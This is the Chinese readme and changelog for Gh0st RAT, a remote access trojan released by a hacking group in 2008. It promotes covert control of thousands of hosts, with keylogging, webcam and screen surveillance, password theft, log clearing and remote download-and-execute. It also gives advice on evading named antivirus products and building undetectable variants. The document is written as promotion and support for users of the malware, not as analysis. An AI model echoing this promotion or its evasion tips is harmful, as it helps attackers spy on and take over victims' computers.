?? readme.txt
字號:
Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net
控制端采用IOCP模型,數據傳輸采用zlib壓縮方式
穩定快速,上線數量無上限,可同時控制上萬臺主機
控制端自動檢測CPU使用率調整自己的工作線程, 穩定高效
宿主為svchost以系統服務啟動,有遠程守護線程,上線間隔為兩分鐘。
心跳包機制防止意外掉線..
支持HTTP和DNS上線兩種方式
自動恢復SSDT(這功能干什么,大家都知道,免殺自己做吧),安裝本程序需要管理員權限
控制端237K,返樸歸真的界面,生成的服務端無殼,111 K,可安裝多個服務端
其它細節方面的功能大家自己去發現吧
功能:
文件管理 完全仿Radmin所寫, 文件、文件夾批量上傳、刪除、下載、創建、重命名
屏幕監視 此模塊全用匯編編寫,傳輸速度快,控制屏幕,發送Ctrl+Alt+Del,剪貼板操作,7種色彩顯示方式
鍵盤記錄 可記錄中英文信息,離線記錄(記錄上限50M)功能
遠程終端 一個簡單shell
系統管理 進程管理,窗口管理,撥號上網密碼獲取
視頻監控 監控遠程攝像頭
會話管理 注銷,重啟,關機,卸載服務端
其它功能 下載執行指定URL中的程序,隱藏或者顯示訪問指定網址,清除系統日志
地址位置 將IP數據庫文件QQWry.Dat放置程序同目錄下即可顯示地理位置
集群控制 可同時控制多臺主機,同時打開視頻監控等管理功能
備注功能 .........
演示地址
http://www.wolfexp.net/other/Gh0st_RAT/index.html
http://www.wolfexp.net/other/Gh0st_RAT/demo.rar
更多請關注紅狼安全小組官方網站 http://www.wolfexp.net/
注: 軟件不斷更新中,有什么意見大家多多提,偶看可以的就采納.....gh0st的成長,離不開大家的幫助.
2008/1/27 11:16 : 優化了屏幕傳輸算法,CPU利用率更低
2008/1/27 16:06 : 驅動以資源方式寫入安裝文件跟DLL文件中,優化屏幕傳輸
2008/1/27 17:26 : 修正驅動安裝時的一個Bug
2008/1/28 05:28 : 服務端安裝強化,加入服務檢測,守護線程強化,加入禁用監視,順便做了下免殺
2008/1/29 12:47 : 改變服務端安裝啟動方式,隱藏服務,去掉驅動程序和守護線程,感謝Lzx無私的幫助...
2008/1/29 16:12 : 修正鍵盤記錄重復問題,優化服務端上線方式
2008/1/30 04:11 : 修正服務端網絡內核的一個導致異常的Bug,優化服務端大小到100K
2008/1/31 01:28 : 重寫服務端網絡內核,加入數據包驗證,及重發功能,更加穩定
2008/1/31 11:36 : 修正服務端網絡內核一個導致數據包混亂的問題,加入幀速限制,傳輸不穩定的情況從此消失...
2008/2/01 10:54 : 主動防御功能加強,過卡巴全監控,瑞星,Kis6,Kis7,Norton,ZoneAlarm,江民2008等殺毒軟件.下個版本準備過所有殺軟的主動...期待吧.
2008/2/01 14:18 : 加入服務端異常處理,更新穩定,請各位幫助測試..
2008/2/01 15:39 : 修正服務端刪除后不能安裝的致命錯誤
2008/2/01 23:35 : 改寫了下服務端一些函數,增加穩定性,春季過后重寫服務端吧,簡潔下程序.
2008/2/02 19:51 : 修正服務端視頻監控功能的一些BUG
2008/2/03 00:40 : 屏幕監控加入顯示遠程鼠標功能
2008/2/05 16:46 : 重寫屏幕傳輸算法,屏幕傳輸更快,控制更穩定..
2008/2/05 23:45 : 還是網絡內核跟屏幕傳輸方面,只求更快,不求最快,前版本屏幕傳輸有問題,舊版本不能上線,請用最新版本...
2008/2/06 17:32 : 服務端做了些優化,加入跟蹤遠程光標的功能,舊版本不能上線,請用最新版本
2008/2/07 00:57 : 改了些服務端,沒事優化優化,準備過完年,大整一下,新年快樂...
2008/2/07 16:02 : 沒事加了個托盤功能,做了些代碼優化,一個人過年,有點郁悶...
2008/2/07 20:42 : 修正服務端一個句柄泄漏的問題..
2008/2/08 22:08 : 全面優化了下服務端,新加了備注功能.
2008/2/09 22:58 : 修正一些大家提到的問題,Gh0st RAT Beta 2.1 發布
2008/2/11 00:18 : 修正服務端安裝的一個BUG,靜心研究ACE中,暫停更新...................
2008/2/17 16:14 : 保存配置文件,服務端支持socks5代理上線,加入下載更新功能,屏幕控制加入,黑屏,鎖定等功能
2008/2/20 10:49 : 應大家要求,看了看江民2008的垃圾主動,連注冊表都沒,隨便改了下服務端,過江民2008主動.其它有啥主動過不了的,抓圖,我抽空解決
Gh0st問答:
2008/2/20 09:26 : 改了下服務端一些網絡方面的東西,看對2003掉線情況是否有效,望大家測試,多謝了.
2008/2/21 15:43 : 服務端掉線問題,重啟后不上線問題,測試版本,請大家測試
2008/2/22 19:47 : 解決重啟后服務端不上線問題,加強對抗主動防御的功能
2008/2/23 17:11 : 全面優化了下服務端,加強穩定性,請大家測試
2008/2/23 19:03 : 修正視頻監視的一個小BUG
2008/2/24 01:55 : 文件管理中加入本地和遠程運行功能,優他了部分代碼,舊版本不會上線,請用新版本
2008/2/24 12:56 : 修正文件管理中一個低級錯誤,下載更新的一個錯誤
2008/2/26 00:00 : 完美解決重復安裝,重復上線問題,發布gh0st2.5,準備第二階段的開發,重點在穩定,實用上....
聲明下軟件的安裝方式:
如果安裝時發現有相同配置的服務端已經安裝過,就不安裝也不刪除,跟鴿子一個原理,我是靠字串區別的
2008/3/2 06:35 : 本著我寫gh0st的初衷,一個共享,免費,的軟件,到今天為止,算是對大家一個交代,新版本開發中,此版本開源..裝上VC6,打造屬于你們自己的gh0st吧..
本人不保留版權,任何信息,自由修改,多謝一直以來大家的支持,我會繼續努力的
在此聲明:此軟件無作者,無版權,由此軟件造成的任何不良后果與紅狼無關,多謝!!!!
1:為什么服務端下線后,控制端沒反應
答:控制端檢測心跳包間隔為1分鐘,過一分鐘后,自然就下線了
2:下線后多長時間才能再上線
答:服務端斷線重連間隔為1分鐘
3:怎么找不到在哪控制屏幕,跟鍵盤的離線記錄
答:在標題欄點右鍵,也就是系統菜單,就能看到
4:為什么有時會出現重復上線的問題
答:服務端發生異常,就會重新連接創建第二個連接,但是第一個連接已經斷開了,控制端在其心跳超時的情況下,會刪除
心跳超時為1分鐘,也就是說,重復上線情況會持續一分鐘,自然就沒有了
5:有些大家提到的有些功能,為什么沒有加上去
答:gh0st作者有自己的想法,自己的宗旨
6:提出建議或問題后多長時間能解決
答:偶以最快的速度,把gh0st做的專業,強大,穩定.
7: 如果做免殺???
答:服務端用ResourceHacker或者別的資源提取工具打開,會看到兩個資源,分別是DLL文件和恢復SSDT的驅動,開始動手吧....
8:能不能加入系統服務管理的功能呢?
答:系統服務管理,注冊表管理等這些,我感覺沒必要加才不加的,服務管理sc就能搞定,注冊表reg就搞定,服務端加這些函數,對免殺也有影響
9:希望能夠加入服務端安裝判斷的功能,要不然連續運行兩次,就上線兩次。
答:現在服務端安裝是共享模式,可以安裝多個,上線多個,實際上不是重復上線,版本穩定后,服務端三種安裝模式:獨占模式,單一模式,共享模式,顧名思義的理解吧
10: ...虛位以待...?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -